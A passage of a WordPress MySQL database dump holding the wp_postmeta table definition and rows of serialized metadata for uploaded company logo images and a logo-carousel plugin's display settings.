id=\"wp-duotone-primary-and-tertiary\"><feColorMatrix color-interpolation-filters=\"sRGB\" type=\"matrix\" values=\" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 \" /><feComponentTransfer color-interpolation-filters=\"sRGB\" ><feFuncR type=\"table\" tableValues=\"0.10196078431373 0.96470588235294\" /><feFuncG type=\"table\" tableValues=\"0.27058823529412 0.96470588235294\" /><feFuncB type=\"table\" tableValues=\"0.28235294117647 0.96470588235294\" /><feFuncA type=\"table\" tableValues=\"1 1\" /></feComponentTransfer><feComposite in2=\"SourceGraphic\" operator=\"in\" /></filter></defs></svg>','no');
/*!40000 ALTER TABLE `wp_options` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_postmeta`
--

DROP TABLE IF EXISTS `wp_postmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_postmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `post_id` (`post_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=651 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_postmeta`
--

LOCK TABLES `wp_postmeta` WRITE;
/*!40000 ALTER TABLE `wp_postmeta` DISABLE KEYS */;
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES (1,2,'_wp_page_template','default'),(2,3,'_wp_page_template','default'),(3,5,'_edit_last','1'),(4,5,'_edit_lock','1664212614:1'),(5,6,'_wp_attached_file','2022/09/logo-naranjax-2.png'),(6,6,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:197;s:6:\"height\";i:47;s:4:\"file\";s:27:\"2022/09/logo-naranjax-2.png\";s:8:\"filesize\";i:10791;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"logo-naranjax-2-150x47.png\";s:5:\"width\";i:150;s:6:\"height\";i:47;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5037;}s:26:\"meta-slider-resized-109x47\";a:5:{s:4:\"file\";s:26:\"logo-naranjax-2-109x47.png\";s:5:\"width\";i:109;s:6:\"height\";i:47;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3826;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(7,5,'_thumbnail_id','6'),(8,7,'_edit_last','1'),(9,7,'_edit_lock','1664291019:1'),(10,7,'sp_lcp_shortcode_options','a:58:{s:10:\"lcp_layout\";s:8:\"carousel\";s:22:\"lcp_logo_carousel_mode\";s:8:\"standard\";s:21:\"lcp_number_of_columns\";a:5:{s:10:\"lg_desktop\";i:5;s:7:\"desktop\";i:4;s:6:\"tablet\";i:3;s:16:\"mobile_landscape\";i:2;s:6:\"mobile\";i:1;}s:22:\"lcp_display_logos_from\";s:6:\"latest\";s:25:\"lcp_number_of_total_items\";N;s:18:\"lcp_logo_link_type\";s:4:\"none\";s:17:\"lcp_item_order_by\";s:4:\"date\";s:14:\"lcp_item_order\";s:3:\"ASC\";s:13:\"lcp_preloader\";s:1:\"1\";s:17:\"lcp_section_title\";s:0:\"\";s:24:\"lcp_section_title_margin\";a:1:{s:6:\"bottom\";i:30;}s:15:\"lcp_logo_margin\";a:1:{s:3:\"all\";i:12;}s:20:\"lcp_content_position\";s:7:\"default\";s:24:\"lcp_section_logo_tooltip\";s:0:\"\";s:16:\"lcp_logo_tooltip\";s:1:\"1\";s:25:\"lcp_logo_tooltip_position\";s:3:\"top\";s:22:\"lcp_logo_tooltip_width\";s:3:\"220\";s:23:\"lcp_logo_tooltip_effect\";s:4:\"grow\";s:22:\"lcp_logo_tooltip_color\";a:2:{s:6:\"color1\";s:7:\"#ffffff\";s:6:\"color2\";s:7:\"#000000\";}s:23:\"lcp_section_logo_border\";s:0:\"\";s:14:\"lcp_logo_color\";a:2:{s:6:\"color1\";s:11:\"transparent\";s:6:\"color2\";s:11:\"transparent\";}s:15:\"lcp_logo_border\";a:4:{s:3:\"all\";s:1:\"0\";s:5:\"style\";s:4:\"none\";s:5:\"color\";s:7:\"#dddddd\";s:11:\"hover_color\";s:7:\"#16a08b\";}s:21:\"lcp_logo_outer_border\";s:1:\"1\";s:17:\"lcp_border_radius\";a:2:{s:3:\"all\";s:1:\"0\";s:4:\"unit\";s:2:\"px\";}s:20:\"lcp_logo_shadow_type\";s:3:\"off\";s:14:\"lcp_logo_image\";s:1:\"1\";s:15:\"lcp_image_sizes\";s:4:\"full\";s:19:\"lcp_image_crop_size\";a:3:{s:3:\"top\";s:0:\"\";s:5:\"right\";s:0:\"\";s:5:\"style\";s:9:\"Hard-crop\";}s:13:\"load_2x_image\";s:0:\"\";s:26:\"lcp_logo_zoom_effect_types\";s:3:\"off\";s:20:\"lcp_logo_blur_effect\";s:0:\"\";s:16:\"lcp_logo_opacity\";s:1:\"1\";s:19:\"lcp_logo_gray_scale\";s:3:\"off\";s:34:\"lcp_grid_inline_vertical_alignment\";s:6:\"middle\";s:20:\"lcp_image_title_attr\";s:0:\"\";s:23:\"lcp_vertical_horizontal\";s:10:\"horizontal\";s:22:\"lcp_carousel_auto_play\";s:1:\"1\";s:28:\"lcp_carousel_auto_play_speed\";i:3000;s:25:\"lcp_carousel_scroll_speed\";i:600;s:27:\"lcp_carousel_pause_on_hover\";s:1:\"0\";s:20:\"lcp_slides_to_scroll\";a:5:{s:10:\"lg_desktop\";i:1;s:7:\"desktop\";i:1;s:6:\"tablet\";i:1;s:16:\"mobile_landscape\";i:1;s:6:\"mobile\";i:1;}s:21:\"lcp_carousel_infinite\";s:1:\"1\";s:12:\"lcp_rtl_mode\";s:5:\"false\";s:8:\"lcp_rows\";a:5:{s:10:\"lg_desktop\";s:1:\"1\";s:7:\"desktop\";s:1:\"1\";s:6:\"tablet\";s:1:\"1\";s:16:\"mobile_landscape\";s:1:\"1\";s:6:\"mobile\";s:1:\"1\";}s:12:\"lcp_nav_show\";s:4:\"hide\";s:16:\"lcp_nav_position\";s:9:\"top_right\";s:13:\"lcp_nav_color\";a:4:{s:6:\"color1\";s:7:\"#f5f5f5\";s:6:\"color2\";s:7:\"#ffffff\";s:6:\"color3\";s:11:\"transparent\";s:6:\"color4\";s:7:\"#1589c2\";}s:14:\"lcp_nav_border\";a:4:{s:3:\"all\";s:1:\"1\";s:5:\"style\";s:5:\"solid\";s:5:\"color\";s:7:\"#aaaaaa\";s:11:\"hover_color\";s:7:\"#1589c2\";}s:17:\"lcp_carousel_dots\";s:4:\"hide\";s:23:\"lcp_carousel_dots_color\";a:2:{s:6:\"color1\";s:7:\"#dddddd\";s:6:\"color2\";s:7:\"#1589c2\";}s:18:\"lcp_carousel_swipe\";s:1:\"1\";s:22:\"lcp_carousel_draggable\";s:1:\"1\";s:28:\"lcp_section_title_typography\";a:2:{s:4:\"type\";s:6:\"google\";s:4:\"unit\";s:2:\"px\";}s:25:\"lcp_logo_title_typography\";a:2:{s:4:\"type\";s:6:\"google\";s:4:\"unit\";s:2:\"px\";}s:31:\"lcp_logo_description_typography\";a:2:{s:4:\"type\";s:6:\"google\";s:4:\"unit\";s:2:\"px\";}s:24:\"lcp_read_more_typography\";a:2:{s:4:\"type\";s:6:\"google\";s:4:\"unit\";s:2:\"px\";}s:31:\"lcp_logo_popup_title_typography\";a:2:{s:4:\"type\";s:6:\"google\";s:4:\"unit\";s:2:\"px\";}s:37:\"lcp_logo_popup_description_typography\";a:2:{s:4:\"type\";s:6:\"google\";s:4:\"unit\";s:2:\"px\";}}'),(11,8,'_edit_last','1'),(12,8,'_edit_lock','1664212879:1'),(13,9,'_wp_attached_file','2022/09/1-2.png'),(14,9,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:165;s:6:\"height\";i:48;s:4:\"file\";s:15:\"2022/09/1-2.png\";s:8:\"filesize\";i:4446;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:14:\"1-2-150x48.png\";s:5:\"width\";i:150;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4056;}s:26:\"meta-slider-resized-112x48\";a:5:{s:4:\"file\";s:14:\"1-2-112x48.png\";s:5:\"width\";i:112;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3179;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(15,8,'_thumbnail_id','9'),(16,11,'_wp_attached_file','2022/09/Axion_energy_logo-2.png'),(17,11,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:197;s:6:\"height\";i:92;s:4:\"file\";s:31:\"2022/09/Axion_energy_logo-2.png\";s:8:\"filesize\";i:18394;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:30:\"Axion_energy_logo-2-150x92.png\";s:5:\"width\";i:150;s:6:\"height\";i:92;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10807;}s:26:\"meta-slider-resized-197x84\";a:5:{s:4:\"file\";s:30:\"Axion_energy_logo-2-197x84.png\";s:5:\"width\";i:197;s:6:\"height\";i:84;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:13162;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(18,10,'_edit_last','1'),(19,10,'_edit_lock','1664212898:1'),(20,10,'_thumbnail_id','11'),(21,13,'_wp_attached_file','2022/09/Banco-Columbia-2.png'),(22,13,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:192;s:6:\"height\";i:49;s:4:\"file\";s:28:\"2022/09/Banco-Columbia-2.png\";s:8:\"filesize\";i:9442;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"Banco-Columbia-2-150x49.png\";s:5:\"width\";i:150;s:6:\"height\";i:49;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7453;}s:26:\"meta-slider-resized-114x49\";a:5:{s:4:\"file\";s:27:\"Banco-Columbia-2-114x49.png\";s:5:\"width\";i:114;s:6:\"height\";i:49;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5860;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23,12,'_edit_last','1'),(24,12,'_thumbnail_id','13'),(25,12,'_edit_lock','1664212917:1'),(26,15,'_wp_attached_file','2022/09/Banco_Hipotecario-2.png'),(27,15,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:194;s:6:\"height\";i:69;s:4:\"file\";s:31:\"2022/09/Banco_Hipotecario-2.png\";s:8:\"filesize\";i:9323;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:30:\"Banco_Hipotecario-2-150x69.png\";s:5:\"width\";i:150;s:6:\"height\";i:69;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5451;}s:26:\"meta-slider-resized-161x69\";a:5:{s:4:\"file\";s:30:\"Banco_Hipotecario-2-161x69.png\";s:5:\"width\";i:161;s:6:\"height\";i:69;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5747;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(28,14,'_edit_last','1'),(29,14,'_thumbnail_id','15'),(30,14,'_edit_lock','1664212940:1'),(31,17,'_wp_attached_file','2022/09/Banco-Galicia1-2.png'),(32,17,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:176;s:6:\"height\";i:46;s:4:\"file\";s:28:\"2022/09/Banco-Galicia1-2.png\";s:8:\"filesize\";i:7188;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"Banco-Galicia1-2-150x46.png\";s:5:\"width\";i:150;s:6:\"height\";i:46;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:6057;}s:26:\"meta-slider-resized-107x46\";a:5:{s:4:\"file\";s:27:\"Banco-Galicia1-2-107x46.png\";s:5:\"width\";i:107;s:6:\"height\";i:46;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4221;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(33,16,'_edit_last','1'),(34,16,'_thumbnail_id','17'),(35,16,'_edit_lock','1664212957:1'),(36,19,'_wp_attached_file','2022/09/BBVA-Logo-2.png'),(37,19,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:198;s:6:\"height\";i:60;s:4:\"file\";s:23:\"2022/09/BBVA-Logo-2.png\";s:8:\"filesize\";i:3332;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"BBVA-Logo-2-150x60.png\";s:5:\"width\";i:150;s:6:\"height\";i:60;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2979;}s:26:\"meta-slider-resized-140x60\";a:5:{s:4:\"file\";s:22:\"BBVA-Logo-2-140x60.png\";s:5:\"width\";i:140;s:6:\"height\";i:60;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2808;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(38,18,'_edit_last','1'),(39,18,'_thumbnail_id','19'),(40,18,'_edit_lock','1664212977:1'),(41,21,'_wp_attached_file','2022/09/cabify-logo-2.png'),(42,21,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:200;s:6:\"height\";i:66;s:4:\"file\";s:25:\"2022/09/cabify-logo-2.png\";s:8:\"filesize\";i:3652;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"cabify-logo-2-150x66.png\";s:5:\"width\";i:150;s:6:\"height\";i:66;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2977;}s:26:\"meta-slider-resized-154x66\";a:5:{s:4:\"file\";s:24:\"cabify-logo-2-154x66.png\";s:5:\"width\";i:154;s:6:\"height\";i:66;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3061;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(43,20,'_edit_last','1'),(44,20,'_thumbnail_id','21'),(45,20,'_edit_lock','1664213002:1'),(46,23,'_wp_attached_file','2022/09/Casino-Santa-Fe-2.png'),(47,23,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:195;s:6:\"height\";i:134;s:4:\"file\";s:29:\"2022/09/Casino-Santa-Fe-2.png\";s:8:\"filesize\";i:15758;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:29:\"Casino-Santa-Fe-2-150x134.png\";s:5:\"width\";i:150;s:6:\"height\";i:134;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12999;}s:26:\"meta-slider-resized-195x83\";a:5:{s:4:\"file\";s:28:\"Casino-Santa-Fe-2-195x83.png\";s:5:\"width\";i:195;s:6:\"height\";i:83;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8743;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(48,22,'_edit_last','1'),(49,22,'_thumbnail_id','23'),(50,22,'_edit_lock','1664213023:1'),(51,25,'_wp_attached_file','2022/09/castellaro-automotores-2.png'),(52,25,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:190;s:6:\"height\";i:45;s:4:\"file\";s:36:\"2022/09/castellaro-automotores-2.png\";s:8:\"filesize\";i:18345;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:35:\"castellaro-automotores-2-150x45.png\";s:5:\"width\";i:150;s:6:\"height\";i:45;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10181;}s:26:\"meta-slider-resized-105x45\";a:5:{s:4:\"file\";s:35:\"castellaro-automotores-2-105x45.png\";s:5:\"width\";i:105;s:6:\"height\";i:45;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:6906;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(53,24,'_edit_last','1'),(54,24,'_thumbnail_id','25'),(55,24,'_edit_lock','1664213041:1'),(56,27,'_wp_attached_file','2022/09/club-la-nacion-2.png'),(57,27,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:159;s:6:\"height\";i:92;s:4:\"file\";s:28:\"2022/09/club-la-nacion-2.png\";s:8:\"filesize\";i:6899;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"club-la-nacion-2-150x92.png\";s:5:\"width\";i:150;s:6:\"height\";i:92;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5184;}s:26:\"meta-slider-resized-159x68\";a:5:{s:4:\"file\";s:27:\"club-la-nacion-2-159x68.png\";s:5:\"width\";i:159;s:6:\"height\";i:68;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4790;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(58,26,'_edit_last','1'),(59,26,'_thumbnail_id','27'),(60,26,'_edit_lock','1664213205:1'),(61,29,'_wp_attached_file','2022/09/credife-2.png'),(62,29,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:182;s:6:\"height\";i:200;s:4:\"file\";s:21:\"2022/09/credife-2.png\";s:8:\"filesize\";i:27849;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"credife-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:19792;}s:26:\"meta-slider-resized-182x78\";a:5:{s:4:\"file\";s:20:\"credife-2-182x78.png\";s:5:\"width\";i:182;s:6:\"height\";i:78;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12171;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(63,28,'_edit_last','1'),(64,28,'_thumbnail_id','29'),(65,28,'_edit_lock','1664213094:1'),(66,30,'_edit_last','1'),(67,30,'_edit_lock','1664213112:1'),(68,31,'_wp_attached_file','2022/09/d062f77a8c15a46b1e84001f610e5021-2.png'),(69,31,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:200;s:6:\"height\";i:84;s:4:\"file\";s:46:\"2022/09/d062f77a8c15a46b1e84001f610e5021-2.png\";s:8:\"filesize\";i:5608;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:45:\"d062f77a8c15a46b1e84001f610e5021-2-150x84.png\";s:5:\"width\";i:150;s:6:\"height\";i:84;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5253;}s:26:\"meta-slider-resized-196x84\";a:5:{s:4:\"file\";s:45:\"d062f77a8c15a46b1e84001f610e5021-2-196x84.png\";s:5:\"width\";i:196;s:6:\"height\";i:84;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5807;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(70,30,'_thumbnail_id','31'),(71,33,'_wp_attached_file','2022/09/download-2.png'),(72,33,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:168;s:6:\"height\";i:104;s:4:\"file\";s:22:\"2022/09/download-2.png\";s:8:\"filesize\";i:3865;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"download-2-150x104.png\";s:5:\"width\";i:150;s:6:\"height\";i:104;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3600;}s:26:\"meta-slider-resized-168x72\";a:5:{s:4:\"file\";s:21:\"download-2-168x72.png\";s:5:\"width\";i:168;s:6:\"height\";i:72;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2731;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(73,32,'_edit_last','1'),(74,32,'_thumbnail_id','33'),(75,32,'_edit_lock','1664213129:1'),(76,35,'_wp_attached_file','2022/09/edesur-2.png'),(77,35,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:192;s:6:\"height\";i:45;s:4:\"file\";s:20:\"2022/09/edesur-2.png\";s:8:\"filesize\";i:7623;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"edesur-2-150x45.png\";s:5:\"width\";i:150;s:6:\"height\";i:45;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4508;}s:26:\"meta-slider-resized-105x45\";a:5:{s:4:\"file\";s:19:\"edesur-2-105x45.png\";s:5:\"width\";i:105;s:6:\"height\";i:45;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3468;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(78,34,'_edit_last','1'),(79,34,'_thumbnail_id','35'),(80,34,'_edit_lock','1664213147:1'),(81,37,'_wp_attached_file','2022/09/experta-art-2.png'),(82,37,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:200;s:6:\"height\";i:88;s:4:\"file\";s:25:\"2022/09/experta-art-2.png\";s:8:\"filesize\";i:8062;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"experta-art-2-150x88.png\";s:5:\"width\";i:150;s:6:\"height\";i:88;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7191;}s:26:\"meta-slider-resized-200x85\";a:5:{s:4:\"file\";s:24:\"experta-art-2-200x85.png\";s:5:\"width\";i:200;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8027;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(83,36,'_edit_last','1'),(84,36,'_thumbnail_id','37'),(85,36,'_edit_lock','1664223205:1'),(86,2,'_edit_lock','1664223347:1'),(87,40,'_edit_last','1'),(88,40,'_edit_lock','1664280120:1'),(89,41,'_wp_attached_file','2022/09/federacion-patronal-seguros-2.png'),(90,41,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:191;s:6:\"height\";i:31;s:4:\"file\";s:41:\"2022/09/federacion-patronal-seguros-2.png\";s:8:\"filesize\";i:6251;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:40:\"federacion-patronal-seguros-2-150x31.png\";s:5:\"width\";i:150;s:6:\"height\";i:31;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4223;}s:25:\"meta-sli